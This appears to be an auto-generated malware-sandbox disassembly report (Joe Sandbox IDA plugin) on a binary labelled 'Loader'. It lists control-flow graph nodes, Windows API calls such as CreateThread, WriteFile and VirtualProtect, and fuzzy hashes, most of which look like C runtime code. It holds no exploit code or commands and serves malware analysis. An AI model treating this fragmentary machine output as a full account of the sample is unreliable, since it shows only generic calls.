                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcspn
                                                                                        • String ID: @
                                                                                        • API String ID: 3709121408-2766056989
                                                                                        • Opcode ID: 4e14f1db73e6d6f03a6d93815ab2e9c8cb84b4852a92b150e120b0b32b1ceccf
                                                                                        • Instruction ID: d915e88e0e57bc4c7a9e69fe1553126a0f519625c3905322df0f3475e7a47fdc
                                                                                        • Opcode Fuzzy Hash: 4e14f1db73e6d6f03a6d93815ab2e9c8cb84b4852a92b150e120b0b32b1ceccf
                                                                                        • Instruction Fuzzy Hash: 3232C3B49042698FCB24DF64C981ADEFBF5BF48300F0585AAE849A7351D734AE85CF91

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleFreeProtectVirtual
                                                                                        • String ID: @
                                                                                        • API String ID: 621788221-2766056989
                                                                                        • Opcode ID: f4e2a90f895a88d28fa7986496b88ae6600d33111954812a58d2fd5a3476ad51
                                                                                        • Instruction ID: e5114420890eee9b9a3334b91579d0d1e8ff7909341aca58deef997b2a6f1b7e
                                                                                        • Opcode Fuzzy Hash: f4e2a90f895a88d28fa7986496b88ae6600d33111954812a58d2fd5a3476ad51
                                                                                        • Instruction Fuzzy Hash: E941DDB0D002089FCB04EFA9E8946DEBBF0AF48354F10845AE858AB350D775A944CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 216 ec481d-ec4828 217 ec483e-ec4851 call ec48ae 216->217 218 ec482a-ec483d call ec6bb1 call ec729c 216->218 224 ec487f 217->224 225 ec4853-ec4870 CreateThread 217->225 229 ec4881-ec488d call ec48fe 224->229 227 ec488e-ec4893 225->227 228 ec4872-ec487e GetLastError call ec6bd7 225->228 230 ec489a-ec489e 227->230 231 ec4895-ec4898 227->231 228->224 230->229 231->230
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(?,?,Function_00014935,00000000,?,?), ref: 00EC4866
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,00EBB58D), ref: 00EC4872
                                                                                        • __dosmaperr.LIBCMT ref: 00EC4879
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                                        • String ID:
                                                                                        • API String ID: 2744730728-0
                                                                                        • Opcode ID: 821b00ae3b832a86c62be92e4b0e852311c67e3452eb38d153a450283c23a76a
                                                                                        • Instruction ID: 25ccebda5b08eada88fec2ba81f9517c9dc5dd391afad9aa4a149c06b4543b08
                                                                                        • Opcode Fuzzy Hash: 821b00ae3b832a86c62be92e4b0e852311c67e3452eb38d153a450283c23a76a
                                                                                        • Instruction Fuzzy Hash: 6B012DB3500259ABDF199FA1DD16FAE7BA4EF40364F00505CB901A6190EB728D52DAA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 236 ec49b3-ec49c0 call ecb104 239 ec4a00-ec4a03 ExitThread 236->239 240 ec49c2-ec49ca 236->240 240->239 241 ec49cc-ec49d0 240->241 242 ec49d7-ec49dd 241->242 243 ec49d2 call ecbc52 241->243 245 ec49df-ec49e1 242->245 246 ec49ea-ec49f0 242->246 243->242 245->246 248 ec49e3-ec49e4 CloseHandle 245->248 246->239 247 ec49f2-ec49f4 246->247 247->239 249 ec49f6-ec49fa FreeLibraryAndExitThread 247->249 248->246 249->239
                                                                                        APIs
                                                                                          • Part of subcall function 00ECB104: GetLastError.KERNEL32(00000000,?,00EC6BB6,00ECC132,?,?,00ECB000,00000001,00000364,?,00000005,000000FF,?,00EC495A,00EE56B0,0000000C), ref: 00ECB108
                                                                                          • Part of subcall function 00ECB104: SetLastError.KERNEL32(00000000), ref: 00ECB1AA
                                                                                        • CloseHandle.KERNEL32(?,?,?,00EC48AD,?,?,00EC4993,00000000), ref: 00EC49E4
                                                                                        • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00EC48AD,?,?,00EC4993,00000000), ref: 00EC49FA
                                                                                        • ExitThread.KERNEL32 ref: 00EC4A03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 1991824761-0
                                                                                        • Opcode ID: b377db6f15b61ed76591e2303796a2af4f8d431cff6fd83003478b7055c1345b
                                                                                        • Instruction ID: 6125626c8c347f9092f6c7f7f7b2fd223f358779007a8d072b348fa1133a358b
                                                                                        • Opcode Fuzzy Hash: b377db6f15b61ed76591e2303796a2af4f8d431cff6fd83003478b7055c1345b
                                                                                        • Instruction Fuzzy Hash: A6F0BEB04046446BCB225B36AA59F5B7AA86F00324F086628F83BF65E0EB32DC46C654

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000002,?,00EC4BE6,00EC7849,?,?,00000002,C4C39003,Ix,00000002), ref: 00EC4B35
                                                                                        • TerminateProcess.KERNEL32(00000000,?,00EC4BE6,00EC7849,?,?,00000002,C4C39003,Ix,00000002), ref: 00EC4B3C
                                                                                        • ExitProcess.KERNEL32 ref: 00EC4B4E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 3d2eef545fafcf139094ca0b5ac183bbc48ab5ec039fcfd46093a201a7f5b15b
                                                                                        • Instruction ID: a6dceac8135c48c9f6fac1e1a3186f8678cbc79989132f26d2af449c5c7949ce
                                                                                        • Opcode Fuzzy Hash: 3d2eef545fafcf139094ca0b5ac183bbc48ab5ec039fcfd46093a201a7f5b15b
                                                                                        • Instruction Fuzzy Hash: 2DD017B1004148AFCB112FA2ED5DE483F29AB003517005028B9096A0A1EB32CD46DA44

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00EBB5BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cpp_errorThrow_std::_
                                                                                        • String ID: M*
                                                                                        • API String ID: 2134207285-3724398180
                                                                                        • Opcode ID: f241d0b9ac73692af1d0a465ad47ebc1d65208e1955f34a563396ea67358df8d
                                                                                        • Instruction ID: 30e16029658ffd0252a59bc9fdf36dcc1366e2338f05c00e22626744d06900b2
                                                                                        • Opcode Fuzzy Hash: f241d0b9ac73692af1d0a465ad47ebc1d65208e1955f34a563396ea67358df8d
                                                                                        • Instruction Fuzzy Hash: E521B6B49042099FDB04EFA8D5517AFBBF1BF48304F00886DE445AB391E7749A45CF92

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 274 ed2d15-ed2d37 275 ed2d3d-ed2d3f 274->275 276 ed2f2a 274->276 278 ed2d6b-ed2d8e 275->278 279 ed2d41-ed2d60 call ec7445 275->279 277 ed2f2c-ed2f30 276->277 281 ed2d94-ed2d9a 278->281 282 ed2d90-ed2d92 278->282 287 ed2d63-ed2d66 279->287 281->279 283 ed2d9c-ed2dad 281->283 282->281 282->283 285 ed2daf-ed2dbd call ed1760 283->285 286 ed2dc0-ed2dd0 call ed3042 283->286 285->286 292 ed2e19-ed2e2b 286->292 293 ed2dd2-ed2dd8 286->293 287->277 294 ed2e2d-ed2e33 292->294 295 ed2e82-ed2ea2 WriteFile 292->295 296 ed2dda-ed2ddd 293->296 297 ed2e01-ed2e17 call ed30bf 293->297 301 ed2e6e-ed2e7b call ed34ee 294->301 302 ed2e35-ed2e38 294->302 298 ed2ead 295->298 299 ed2ea4-ed2eaa GetLastError 295->299 303 ed2ddf-ed2de2 296->303 304 ed2de8-ed2df7 call ed3486 296->304 312 ed2dfa-ed2dfc 297->312 306 ed2eb0-ed2ebb 298->306 299->298 319 ed2e80 301->319 307 ed2e5a-ed2e6c call ed36b2 302->307 308 ed2e3a-ed2e3d 302->308 303->304 309 ed2ec2-ed2ec5 303->309 304->312 313 ed2ebd-ed2ec0 306->313 314 ed2f25-ed2f28 306->314 324 ed2e55-ed2e58 307->324 315 ed2ec8-ed2eca 308->315 316 ed2e43-ed2e50 call ed35c9 308->316 309->315 312->306 313->309 314->277 320 ed2ecc-ed2ed1 315->320 321 ed2ef8-ed2f04 315->321 316->324 319->324 325 ed2eea-ed2ef3 call ec6c3d 320->325 326 ed2ed3-ed2ee5 320->326 327 ed2f0e-ed2f20 321->327 328 ed2f06-ed2f0c 321->328 324->312 325->287 326->287 327->287 328->276 328->327
                                                                                        APIs
                                                                                          • Part of subcall function 00ED30BF: GetConsoleOutputCP.KERNEL32(C4C39003,00000000,00000000,?), ref: 00ED3122
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,S',00EC24F1,?,S'), ref: 00ED2E9A
                                                                                        • GetLastError.KERNEL32(?,00EC2753,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED2EA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2915228174-0
                                                                                        • Opcode ID: 3ac0ae0d009845d4bd4492d6391cfa0e153fb26aeff10bac1a3b704672bbc3ea
                                                                                        • Instruction ID: 2e4468ed79b4b324c28a07400f682d00a7a8c3300a8a6684a39f7e5799a6ce82
                                                                                        • Opcode Fuzzy Hash: 3ac0ae0d009845d4bd4492d6391cfa0e153fb26aeff10bac1a3b704672bbc3ea
                                                                                        • Instruction Fuzzy Hash: C461D871900109AFDF11CFA8D984AEE7BB9EF29308F14114AF914B7351D332D902DB61

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 331 ed34ee-ed3543 call ebece0 334 ed35b8-ed35c8 call ebba3f 331->334 335 ed3545 331->335 337 ed354b 335->337 338 ed3551-ed3553 337->338 340 ed356d-ed3592 WriteFile 338->340 341 ed3555-ed355a 338->341 344 ed3594-ed359f 340->344 345 ed35b0-ed35b6 GetLastError 340->345 342 ed355c-ed3562 341->342 343 ed3563-ed356b 341->343 342->343 343->338 343->340 344->334 346 ed35a1-ed35ac 344->346 345->334 346->337 347 ed35ae 346->347 347->334
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00ED2E80,?,00EC2753,?,?,?,00000000), ref: 00ED358A
                                                                                        • GetLastError.KERNEL32(?,00ED2E80,?,00EC2753,?,?,?,00000000,?,?,?,?,S',00EC24F1,?,S'), ref: 00ED35B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID:
                                                                                        • API String ID: 442123175-0
                                                                                        • Opcode ID: d70db6efa135e28de5f0bfa6db45c43c6b72a8ecccf94a95fff486381328bd84
                                                                                        • Instruction ID: 3589e93d48673cd5508f53745427a88d3e49f748713dff3f24041b07ad5169d9
                                                                                        • Opcode Fuzzy Hash: d70db6efa135e28de5f0bfa6db45c43c6b72a8ecccf94a95fff486381328bd84
                                                                                        • Instruction Fuzzy Hash: 88219130A002599FCF19CF29EC80AD9B7F9EB48305F2451AAE906E7311D730EE46CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 348 ecc862-ecc867 349 ecc869-ecc881 348->349 350 ecc88f-ecc898 349->350 351 ecc883-ecc887 349->351 352 ecc8aa 350->352 353 ecc89a-ecc89d 350->353 351->350 354 ecc889-ecc88d 351->354 357 ecc8ac-ecc8b9 GetStdHandle 352->357 355 ecc89f-ecc8a4 353->355 356 ecc8a6-ecc8a8 353->356 358 ecc904-ecc908 354->358 355->357 356->357 359 ecc8bb-ecc8bd 357->359 360 ecc8e6-ecc8f8 357->360 358->349 361 ecc90e-ecc911 358->361 359->360 362 ecc8bf-ecc8c8 GetFileType 359->362 360->358 363 ecc8fa-ecc8fd 360->363 362->360 364 ecc8ca-ecc8d3 362->364 363->358 365 ecc8db-ecc8de 364->365 366 ecc8d5-ecc8d9 364->366 365->358 367 ecc8e0-ecc8e4 365->367 366->358 367->358
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00ECC751,00EE5BA0), ref: 00ECC8AE
                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00ECC751,00EE5BA0), ref: 00ECC8C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID:
                                                                                        • API String ID: 3000768030-0
                                                                                        • Opcode ID: c807283a6298f1f61fad44346feaabe96f2b5bacd5c0f97f7e607993a5711b49
                                                                                        • Instruction ID: e7569a7f781c867f170e8df503cc761e9af0e5724043d1564d1f866bde4f9933
                                                                                        • Opcode Fuzzy Hash: c807283a6298f1f61fad44346feaabe96f2b5bacd5c0f97f7e607993a5711b49
                                                                                        • Instruction Fuzzy Hash: 6F11A5725047554AC7384E3E9E88B33AA94A796338B34275DD0BEA69F1C272E887D604

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00EE56B0,0000000C), ref: 00EC4948
                                                                                        • ExitThread.KERNEL32 ref: 00EC494F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastThread
                                                                                        • String ID:
                                                                                        • API String ID: 1611280651-0
                                                                                        • Opcode ID: b702415c25dc3a0377c820853a3c5d4a8d4a40299e725f431bf2cf5fda37b80c
                                                                                        • Instruction ID: 2837eb00fec184e5cb35f4180697ab33d911c72234d7fdf062a8460f8341b006
                                                                                        • Opcode Fuzzy Hash: b702415c25dc3a0377c820853a3c5d4a8d4a40299e725f431bf2cf5fda37b80c
                                                                                        • Instruction Fuzzy Hash: 7FF0A4B19402459FDB10AF70D946F6E7BB4EF41714F10115DF406BB291DB7159428FA1

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32 ref: 00EB1B98
                                                                                        • GetModuleFileNameA.KERNEL32 ref: 00EB1BB8
                                                                                          • Part of subcall function 00EB1860: CreateFileA.KERNELBASE ref: 00EB18E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModule$CreateHandleName
                                                                                        • String ID:
                                                                                        • API String ID: 2828212432-0
                                                                                        • Opcode ID: 42fa8856a79663f6b487e1e83999c71a62fecba2d1e554eb6e8935b19372cfaa
                                                                                        • Instruction ID: e4988239eb28574c75f310a941a559a48903c8d00b34924879bc70aeaefeaccb
                                                                                        • Opcode Fuzzy Hash: 42fa8856a79663f6b487e1e83999c71a62fecba2d1e554eb6e8935b19372cfaa
                                                                                        • Instruction Fuzzy Hash: 96F0BDB190420C8FC754EF79E9856DEBBF4AB14310F4145BDE4CDE7240EA7459888F86

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 393 ecad27-ecad30 394 ecad5f-ecad60 393->394 395 ecad32-ecad45 RtlFreeHeap 393->395 395->394 396 ecad47-ecad5e GetLastError call ec6bfa call ec6bb1 395->396 396->394
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00ECF0A4,?,00000000,?,?,00ECED44,?,00000007,?,?,00ECF68A,?,?), ref: 00ECAD3D
                                                                                        • GetLastError.KERNEL32(?,?,00ECF0A4,?,00000000,?,?,00ECED44,?,00000007,?,?,00ECF68A,?,?), ref: 00ECAD48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 485612231-0
                                                                                        • Opcode ID: 5dc4de08e96f22dba3f3c2657bca9ccbb0e9cb520ebcc976d93960b7df3aa7ee
                                                                                        • Instruction ID: 9c0efaefa46e05b4990f49e42506a103ceac7ca6801f9195da8212e9c7e2490f
                                                                                        • Opcode Fuzzy Hash: 5dc4de08e96f22dba3f3c2657bca9ccbb0e9cb520ebcc976d93960b7df3aa7ee
                                                                                        • Instruction Fuzzy Hash: 48E08671100208ABCB113BA5BD09F553B98AB4475DF184038F60DFE4B1EA3188518785
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID:
                                                                                        • API String ID: 4218353326-0
                                                                                        • Opcode ID: c780d40ad6557e97afc55967abf9022841c4badf784674081129c9bfb72eced3
                                                                                        • Instruction ID: a06bea429c77b1ed9de9c5eed4c35e5a28148032f675585275f0f27a84cd38e6
                                                                                        • Opcode Fuzzy Hash: c780d40ad6557e97afc55967abf9022841c4badf784674081129c9bfb72eced3
                                                                                        • Instruction Fuzzy Hash: BBC12AB46083408FC704EF68D595AABBBF0AF99354F00992DF996DB3A2D735D904CB42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
